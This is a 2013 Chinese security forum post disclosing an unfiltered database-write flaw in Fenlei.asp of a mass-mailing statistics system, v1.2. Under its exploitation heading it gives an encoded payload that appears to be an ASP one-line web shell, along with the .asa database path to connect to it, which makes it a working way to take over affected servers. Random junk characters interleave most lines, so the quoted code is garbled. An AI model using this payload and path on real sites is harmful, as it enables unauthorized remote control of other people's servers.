找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2551|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp . I$ s# X) [/ {/ k

$ ?" x, w# s9 ?7 p6 E2 ?, cIF Request.QueryString("Action")="del" Then
& G/ Q9 W0 ?# wID=Request.QueryString("ID") " l( U! b- i9 ~$ Y
IF Countss ("tui","Fenlei",ID )<>0 then
( |( Q' C; I: b, b& G" ['略
# c5 Z* B( N7 s9 I5 l7 rIF Request.QueryString("Action")="Add" Then
- w4 H- x; h; q; s* wTname=Request.Form("Typename")
; D% s. i. E/ n# i* v; L1 b! qSet Rs=Server.CreateObject("adodb.Recordset")
' i' f6 m7 T# A9 L/ t1 X- d, D7 RSql="Select * From Fenlei Order by id Desc " ! W* b. {) h$ h4 `) C: C. Z( K3 j; R
Rs.Open Sql,Conn,1,3
! i; Q8 ^8 [: x, s! @/ y- q0 ]- ]+ wRs.Addnew
; L- v" Z+ p& p0 }/ t+ p1 R" V, vRs("Typename")=Tname ; m0 v+ f9 K) q$ j  t6 M
'略 0 T! C' g6 k. {7 p! C5 l5 l9 A
Set Rs=Server.CreateObject("adodb.Recordset") 7 V# T# ?4 ?% n+ C/ e2 Z
Sql="Select * From Fenlei Order by id Desc " " P9 |. e' ~  Z( a4 `; f
Rs.Open Sql,Conn,1,1
, i# ]0 B  E' u'略 ; f2 I3 K( |5 R
%>9 D9 p# p2 K. m! U% w

$ L3 i3 l! `. c0 q* E6 j - k8 n& r3 _0 i0 U: z

, Q! g+ c  N# _& L没有过滤,直接写入数据库。
1 v; t& u! b, @4 n4 e2 y, I( Q& k1 p
3 o! ~3 e; X: \* g# m8 v利用方法:
8 q9 R9 \* a+ V3 o7 }' [0 f 6 @  P' q. e- A% R. ]# X
插入:┼攠數畣整爠煥敵瑳∨≡┩>
4 }) \  ^4 L9 \2 U& ^  ]4 Q) p 9 v; h' n8 U9 b8 f! A  Y% q

, N; N6 I5 g* Q3 E连接: http://www.xxx.com/###tongbaner.asa
7 D. i& u/ I. q" S# _0 E  M'默认安装文件: ) X7 N" Y% \) ~% F, G% K
'install.asp
0 {8 p# D" r5 X# X1 O1 R7 D. `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表